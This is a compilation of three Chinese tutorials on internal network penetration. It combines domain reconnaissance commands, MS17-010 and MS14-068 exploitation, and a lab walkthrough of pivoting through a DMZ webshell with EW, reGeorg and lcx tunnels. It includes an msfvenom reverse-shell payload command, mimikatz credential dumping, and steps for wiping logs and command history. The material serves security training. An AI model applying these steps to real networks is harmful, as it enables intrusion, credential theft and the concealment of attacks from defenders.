目录
 
什么是外网渗透
什么是内网渗透
分类
工作组
域
   
   
内网渗透思路
擦除痕迹步骤
   
   
内网信息收集
内网信息收集
(1) 位置的判断
(2) 角色的判断
(3)连通性的判断
   
   
内网主机存活探测
Hash抓取
横向移动
 

 
在说内网渗透前，先说说什么是外网渗透
 
什么是外网渗透
 
外网更侧重于找漏洞寻找突破口
 举个简单的例子：
 把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门，进入超市。
 
想要进入超市，这个时候我们要寻找一下超市防守不到位的地方：比如是不是窗户没关、监控是不是半夜十二点为了备份前一天的视频内容而短暂失灵、保安是不是凌晨三点就会开始划水、大门是不是可以用万能钥匙打开……
 外网渗透就是收集这些“漏洞”，综合多方因素，利用天时地利人和，突破限制，闯入超市内部。
 
所以，外网渗透阶段，考验的是白帽的综合能力，外网渗透的目的还是为了进入内网。
 
什么是内网渗透
 
内网更侧重于对目标的熟悉程度。
 
如果你突破“外网”的限制，成功进入“内网”，那么这一阶段对你的要求又有所不同。
 对环境是否足够熟悉？对目标的情况是否了然于胸？是否知道哪里有摄像头？哪里有敏感信息，哪里有红外线探测，你要的商品在哪个柜台……
 
在重重关卡下成功拿到信息后，还要全身而退，将你留下的指纹、脚印全擦掉，不留半点痕迹。
 
当然，术业有专攻，作为渗透人员，或许对目标的内部不够熟悉。所以这时候你需要一个帮手——安全运维。安全运维，顾名思义，是运维，相当于超市内部的保安。他能以同行的身份，推测超市的安保情况，而且对超市内部的信息更了解。
 
分类
 
内网渗透分为域渗透和工作组渗透两类。
 域渗透
 
1.域信息收集
2.获取域权限
3.dump域hash
4.内网权限维持
 
工作组渗透
 
1.常规内网渗透
2.各种欺骗攻击
 
工作组
 
工作组里的电脑都是平等的，是最常见最普通的资源管理模式，将不同的电脑按功能分别列入不同的组，以方便管理；相对而言，所处在同一个工作组内部成员相互交换信息的频率最高。
 你可以随便加入同一网络上的任何工作组——如果你加入一个不存在的工作组，也就相当于新建一个工作组了。可以随便离开一个工作组，来去自由。“工作组”就像一个自由加入和退出的群聊一样，它本身的作用仅仅是提供一个“房间”，你只要进群，就能看到群友共享的资源。而且群里没有群主和管理员，群员之间都是平等的。
 
域
 
父域，子域：子域是相对父域来说的，一个父域有很多子域
 林域：以父域为中心，有很多子域。
 单域：只有一个林域
 
域名——dns（严格来说是一种目录服务）——域服务
 域是不平等的，高级域可以操控低级域，父域可以影响子域。比如重置密码等操作。
 
安全组虽然名字里有安全两个字，但是实际上不太安全。
 
所以域就出来了，比起安全组，他多了群主(域控)、多了管理员（管理员服务器）。
 域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时，域控制器首先要鉴别这台电脑是否是属于这个域的，用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确，那么域控制器就会拒绝这个用户从这台电脑登录。
 
在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作。称为“域控制器(Domain Controller，简写为DC)”。也就是所谓的群主。一个群可以没有管理员，但是必须有群主。
 
你想加入一个域，首先得要域控或者管理员服务器在域里面添加一个账号密码，然后你用管理员服务器新建的这个账号密码才能登录。也就是说你想进域，首先得管理员同意才行。
 
每次你登陆域，管理员都会检查账号密码对不对。不对则不许登陆。
 
工作组则不一样了，账号不在工作组里面？那就把这个账号添加进工作组。
 
域一般是大公司使用，等级深明。工作组一般是小公司用，平等自由。
 
内网渗透思路
 
1.内网环境下先查看网络架构。例如 网段信息 域控 DNS服务器 时间服务器
 2.收集到了足够多的信息可以扫一下开放端口 21 22 80 8080 443等确定敏感信息，以及之后渗透的方向
 3.通过以上信息进行一定的弱口令尝试，针对特定的软件做banner采集利用，snmp测试读取和写入权限
 4.进行一些提权操作，从横向和纵向对目标服务器进行渗透。
 5.进行敏感信息挖掘，内网密码收集嗅探，同时擦除入侵足迹。
 
擦除痕迹步骤
 
1.清相关日志
 2.清日志分析服务
 3.清命令行记录（历史命令）
 4.清内存
 5.清缓存 （可以用脚本清，然后销毁脚本）
 
内网信息收集
 
命令
作用
ipconfig /all
查询本机IP段，所在域等
net user
本机用户列表
net localgroup administrators
本机管理员[通常含有域用户]
net user /domain
查询域用户
net group /domain
查询域里面的工作组
net group “domain admins” /domain
查询域管理员用户组
net localgroup administrators /domain
登录本机的域管理员
net localgroup administrators workgroup\user001 /add
域用户添加到本机
net group “domain controllers” /domain
查看域控制器(如果有多台)
net time /domain
判断主域，主域服务器都做时间服务器
net config workstation
当前登录域
net session
查看当前会话
net use \ip\ipc$ pawword /user:username
建立IPC会话[空连接-***]
net share
查看SMB指向的路径[即共享]
net view
查询同一域内机器列表
net view \ip
查询某IP共享
net view /domain
查询域列表
net view /domain:domainname
查看workgroup域中计算机列表
net start
查看当前运行的服务
net accounts
查看本地密码策略
net accounts /domain
查看域密码策略
nbtstat –A ip
netbios 查询
netstat –an/ano/anb
网络连接查询
route print
路由表
tasklist /V
查看进程[显示对应用户]
tasklist /S ip /U domain\username /P /V
查看远程计算机进程列表
qprocess *
类似tasklist
qprocess /SERVER:IP
远程查看计算机进程列表
nslookup –qt-MX Yahoo.com
查看邮件服务器
whoami /all
查询当前用户权限等
set
查看系统环境变量
systeminfo
查看系统信息
qwinsta
查看登录情况
qwinsta /SERVER:IP
查看远程登录情况
fsutil fsinfo drives
查看所有盘符
内网信息收集
 
(1) 位置的判断
 
位置判断是指机器处于网络拓扑中的某个区域，是在DMZ区，办公网，还是核心区，核心DB等多个位置，当然这里的区域并不是绝对的，只是大概的一个环境，不同的地方网络环境不一样，区域的界限也不一定明显。
 
(2) 角色的判断
 
机器角色的判断指判断已经控制的机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器还是代理服务器、DNS服务器、存储服务器等等。具体的判断是通过对机器内的主机名、文件、网络连接等多种情况进行综合判断的。
 
(3)连通性的判断
 
出口流量是否连通的判断指机器是否能上外网这些，要综合判断协议（tcp\http\dns\icmp等协议）与端口(常见能出去的端口有80,8080,443,53,110,123等)。在这里还有一种是网络内网设置了代理服务器的情况，攻击者通常会查看环境变量set，主机名是否有proxy字样的机器，注册表是否有写明代理地址或指定pac代理文件等。
 
内网主机存活探测
 
Ping
 Arp
 Tracert
 route
 
Hash抓取
 
使用mimikatz提取系统hash与明文
 破解出的NTLM可以尝试CMD5破解
 
横向移动
 
1.默认权限配置认知
 当某些普通\不普通用户加入AD的rdp组或其他管理组，当攻击者拿到这些用户的权限时就相当于可以获取到域控制器的权限了。
 
2.端口转发与协议代理
 工作组采取的一般都是常规渗透方法，因为工作组一般都是个人和少数服务器
 
3.工作组横向渗透
 
4.域环境横向渗透
 
5.权限维持

讲在前面:列举的只是部分内网渗透用到的漏洞，当然在不局限于此，根据实际情况进行发挥，同时复现不代表真实渗透环境，在文章最后，我会解释内网渗透主要利用的两个漏洞做的事情。认真看好吗弟弟！！！
 
MS17-010 主机漏洞，永恒之蓝
 
漏洞复现，关于windows主机漏洞在MSF下常用的几个成熟模块如下所示：
 
 
 
auxiliary/scanner/smb/smb_version
 auxiliary/scanner/smb/smb_ms17_010
 auxiliary/admin/smb/ms17_010_command
 exploit/windows/smb/ms17_010_eternalblue
 exploit/windows/smb/ms17_010_psexec
 
 
按照正常的情况来，我们优先对目标机器进行版本信息扫描以及漏洞探测，使用如下模块
 扫描模块：
 
 
 
use auxiliary/scanner/smb/smb_version 扫描目标机器的445版本信息
 use auxiliary/scanner/smb/smb_ms17_010 扫描目标机器是否存在445
 
 
 
 
MSF命令:
 
 
设置某一模块参数   set 参数名 参数内容
 
 
选择某一个模块       use  模块路径
 
 
查看当前模块设置   show options
 
 
将当前meterpreter会话放在后台     background sessions
 
 
进入当前后台某一会话              
 
 
 
 
攻击模块：
 
 
 
auxiliary/admin/smb/ms17_010_command
 exploit/windows/smb/ms17_010_eternalblue
 exploit/windows/smb/ms17_010_psexec
 
 
 
 
 
 
这里我们讲smbuser和smbpass设置了，不然会出现找不到命名管道
 
 
按照实验的情况，MS17-010对实验的Win7存在版本的要求，如果对应版本的Win7系统使用MSF的psexec模块攻击找不到命名管道，属于正常现象，解决办法是可以寻找一个帐号密码和添加管道命名（管道命名的成功概率很低，还是选找一个新的帐号密码为好）
 
 
 
MS-14-068 服务漏洞，域用户权限提升
 
漏洞复现：
 
目前公开的利用方式有博客可循的，三种方式，利用msf进行ms14-068提权。利用ms14-068.exe工具集成minikatz功能直接写入。使用MS14-068.exe加minikataz进行权限提升
 
使用该漏洞，实际环境要么是流量代理出来进行交互操作，要么是直接上传ms14-068.exe不进行交互操作直接拿返回结果进行操作，当然实际运用可以自行发挥。
 
使用MS14-068.exe操作
 
win7旗舰版
 
windows-server-2008
 
查看当前域用户能否直接查看域控主机盘符
 
 
minikataz查看本机内存票据，并进行清除
 
 
 
查看本机域用户sid
 
 
使用MS14-068工具生成该域用的高权限票据
 
 
使用minikataz将票据写入内存中
 
 
再次查看能否查看域控主机盘符
 
 
使用ms14-068.exe操作
 
获取指定域账户的详细信息，为伪造票据并写入做准备
 
 
根据获取的信息。对域账户进行权限提升，也就是做写入域管理权限的票据到内存的操作
 
 
 
写入失败。这里未细究是系统版本位数不对还是如何。
 
 
使用MSF进行权限提升漏洞
 
这是国外博客给出的利用过程，明天更新kali如何操作，并完成内网渗透-隧道代理的博客
 
https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit

内网渗透 | 手把手教你如何进行内网渗透
 
目录
 
内网渗透 | 手把手教你如何进行内网渗透
 
0x01 DMZ渗透
 
0x02 跳板及内网探测
 
0x2.1 做跳板
 
0x2.2 内网探测
 
0x03 第二层渗透
 
0x3.1 web渗透 or MS17_010
 
0x3.2 内网探测+跳板代理链
 
0x4 第三层内网渗透
 
0x5 总结
 
0x5.1 跳板总结
 
0x5.2 内网探测
 
0x5.3 后话
 

 
 
 
 
0x01 DMZ渗透
 
 
 
 
首页
 
看到DMZ开启了web服务，是一个typecho的cms，后台默认就是/admin
 
 
后台
 
尝试爆破
 
 
弱口令admin1234
 
 
 
但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。
 
 
exp
 
 
上面呢，就是利用exp将一句话写入当前目录的shellx.php中。
 
 
get shell
 
 
 
到这里呢，想了想我们的目标是内网，并且防火墙没开，就不考虑提权了。
 

 
 
0x02 跳板及内网探测
 
 
 
现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。
 
 
 
0x2.1 做跳板
 
采用ew套接字<socks>代理，服务器上运行准备好的ew_for_linux64，本地使用proxifier配置如下：
 
 
 
代理规则配置如上，可以根据情况具体配置，以上是Windows端的配置，但是渗透难免会用到kali，所以kali也需要配置：
 
 
首先修改一下/etc/proxychains.conf，如下图所示：
 
 
 
修改完成后保存，然后就可以proxychains nmap等等。
 
 
 
至此，跳板配置基本完成。
 
还有一种方法是利用msf生成马儿让目标运行，反弹回来meterpreter查看路由添加路由，然后msf就可以访问内网，可以使用msf来探测以及渗透测试。
 
 
 
0x2.2 内网探测
 
 
 
这里首先有几种方法。
 
 
 
第一种，ifconfig，适用于双网卡的情况：
 
 
但是可以看到，并没有我们需要的信息。
 
 
 
第二种查看路由以及arp：
 
 
路由
 
 
 
上图是查看路由，还可以利用arp -a查看一下arp的信息，以及可以利用traceroute xxx.com查看一下路由走的路径。
 
 
 
但是看到也没有我们想要的信息，到这里我是很迷茫了，找不到内网另一个ip段，我就去问了一下环境的搭建者，他也不知道怎么找，索性就把ip段告诉了我，此处留个疑问，希望有想法的大佬联系我。
 
 
 
既然知道了ip段，就需要探测一下到底哪些主机我们可以渗透：
 
 
nmap
 
 
 
利用proxychain nmap达到nmap使用代理扫描的效果，这里需要注意的是socket代理不支持ICMP协议，所以nmap的参数应设置如上图所示，端口可以自己改。
 
 
 
可以看到10.10.1.1以及10.10.1.2的80端口都开着，那我就proxychains3 firefox打开火狐访问了一下，第一个是路由器的管理，第二个是一个cms。到这里呢，可以去猜一下路由的密码，我是直接去看了cms，因为kali中渗透web有点麻烦，所以就利用上面配置好的proxifier代理在Windows下进行渗透。
 

 
 
0x03 第二层渗透
 
 
 
0x3.1 web渗透 or MS17_010
 
 
 
 
UKcms
 
 
后台
 
 
 
后台默认路径/admin.php，使用了默认账号密码admin 123456
 
 
 
这个cms呢，后台可以getshell，我是被卡在burpsuite抓包上面，开了burpsuite总是无法访问，后来才发现，在burpsuite里面设置了socks代理就没必要再开proxifier了。burp配置如下：
 
 
第一种方法
 
 
 
 
第二种方法
 
 
 
如上配置后，就不需要再开socks代理工具了，否则会出现问题。
 
 
在后台添加php允许上传，再去上传点，不要传php因为判断了Content-Type。
 
 
 
 
传图片抓包改成php
 
 
 
会看到上传成功的提醒，关于路径有以下方法：
 
 
 
成功getshell，这是一种方法，比较麻烦。
 
 
 
前期内网探测时发现了这是台windows服务器，并且存在MS17_010漏洞，可以proxychains3 msfconsole利用msf直接打。
 
 
 
0x3.2 内网探测+跳板代理链
 
 
 
因为这是第二层内网，所以要连接webshell需要打开proxifier然后用AntSword进行连接。
 
 
 
双网卡
 
 
 
如上图我们知道了第三层ip段为4.4.1.x，看一下arp表：
 
 
这种基本猜测下个目标就是4.4.1.2了，但还是需要nmap探测一下，在此之前，先配置代理链。
 
 
 
还是使用earthworm进行socks代理，服务端运行后，本机配置如下：
 
 
windows
 
 
kali
 
配置完成后，用nmap探测一下
 
 
可以看到开了135、445、3389,啥都不说了，永恒之蓝打一波。
 
 
 
0x4 第三层内网渗透
 
 
 
 
 
这里需要注意，payload要选择正向连接的，不要反弹shell，因为我们访问得到目标而目标访问不到我们。
 
 
得到一个meterpreter shell。
 
 
read password
 
 
 
这样我们拿到了admin的密码，直接远程连接：
 
 
3389
 
至此呢，本次内网渗透就完成了。
 
 
 
0x5 总结
 
 
 
0x5.1 跳板总结
 
 
 
拿到DMZ的shell或权限后，可以使用ew建立socks代理，我们的windows用proxifier，我们的linux用proxychains连接，即可访问内网。如果是多层，那么proxifier提供代理链，proxychains也可以多层代理。
 
ew_for_linux64 -s ssocksd -l 8888
ew_for_windows.exe -s ssocksd -l 8888
ew建立ss连接。
 
windows下若需要burpsuite进行配合，就关掉proxifier，使用burpsuite配置socks代理，其他步骤和平常使用burp一样即可。
 
 
 
Linux下若使用burpsuite与上面同理，不要使用proxychains即可。
 
 
 
0x5.2 内网探测
 
 
 
Linux下还可以通过msf进行内网探测以及攻击：
 
 
 
 
步骤
 

  
 
payload
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe
反弹payload配置，正向配置rhost以及rport即可。
 
针对双网卡的目标：
 
 
ipconfig或ifconfig
 
 
arp
 
若是路由的话，可以先看一下路由，或按照上面msf的情况：
 
 
route
 
若是没有有效信息，可以考虑社工。
 
 
 
关于nmap：
 
 
因为ss不支持ICMP协议，所以要加如上参数，若需要其他功能则直接加就行。
 
 
 
0x5.3 后话
 
 
 
本次DMZ开启了web服务是linux服务器，第二层开了web服务是windows服务器，第三层windows服务器。
 
渗透过程中，首先要明确目标开了什么服务，什么操作系统等等，我们才知道如何下手。
 
本次渗透没有涉及域渗透，只是简单说明一下渗透流程。
 
 
 
 
原创投稿作者：Railgun
 
作者博客：www.pwn4fun.com
 
本文作者：HACK_Learn
 
本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/123000.html

浅析内网渗透
 
关于内网渗透其实方法和思路以及要注意的点内容非常多，又是一个大坑，我就暂且先从三个情况下分别整理一种方法，大概了解一下，先挖个坑哈，手里还有资料但太乱了，之后我再整理吧（真的很多，不是我偷懒，看的眼都晕了，感觉就是一套全新的渗透测试那么多）
 
 
前瞻
 
先回看一下之前的几个小思路吧
 
Webshell如何开启3389服务
 
1、通过修改注册表开启远程终端，详情请看： http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html
 2、通过3389工具开启远程终端
 3、数据库可以开
 4、上传exe可以开
 
服务器端口被修改如何查找
 
注册表读取、
 端口扫描、
 命令探针查找修改后的端口
 
外到内渗透连接
 
拿到webshell，服务器处于内网（没有公网地址）的情况下如何远程连接
 
1、通过lcx工具解决内网远程连接
 
把lcx传到远程服务器去
 原理就是把目标机端口转发到自己公网IP的端口
 Webshell上执行：lcx.exe -slave 自己的公网ip 2222 127.0.0.1 3389
 将本机3389端口流量转发到公网ip的2222端口上去
 自己的电脑里面执行：lcx.exe -listen 2222 4444
 监听本地的2222端口将流量转发到4444
 然后连接127.0.0.1 4444
 
缺陷
 
可能在公司里实际渗透测试过程中，你是在内网中的，同时你无法操控路由器，没有公网地址
 解决就通过下面讲的服务器处于内网远程连接
 
内到内渗透连接
 
两台电脑分别在各自的内网怎么连接
 
通过端口转发脚本解决内网远程连接
 通过reDUH
 选择对应语言的文件上传
 访问一下
 通过设置，将本地3389映射到1234上
 访问127.0.0.1 1234
 
内网渗透测试
 
在上面我们讲到的都是单端口转发，那么如何扩大战果，得到与目标机同一公网下的其他主机的权限呢
 
环境准备
 
两台虚拟机
 两个网卡
 一个处于lan区段1
 另一个nat模式映射到公网
 
方法：需要两个工具结合
 
reGeorg
 
把tunnel.php传到服务器
 本地执行cmd
 
reGeorg-master\reGeorgSocksProxy.py -p  9999 -u http://192.168.0.102:8080/tunnel.nosocket.php
 
让内网之间构成一个通道
 
Proxifier
 
代理工具装在本机
 设置地址127.0.0.1端口跟上面对应
 协议选择
 
 
 
socks协议
 各种协议都支持
 https协议
 web
 
 
配置代理规则
 
 
 
本地所有数据包都走socks
 通过它转发本地所有流量
 
 
补充
 
关于burp+Proxifier结合抓包
 
有很多APP现在是防代理的或者黑名单防御，比如微信
 但是抓包中间加一个环节使用这个软件 就可以应对了
 因为socks是很正规的
 
方法
 在电脑上装模拟器
 把burp ca证书丢在模拟器里加载
 设置规则 新建规则 让模拟器这个进程所有数据包走socks就可以了
 注意 结合使用的工具不要进行拦截 要选择direct模式
 访问验证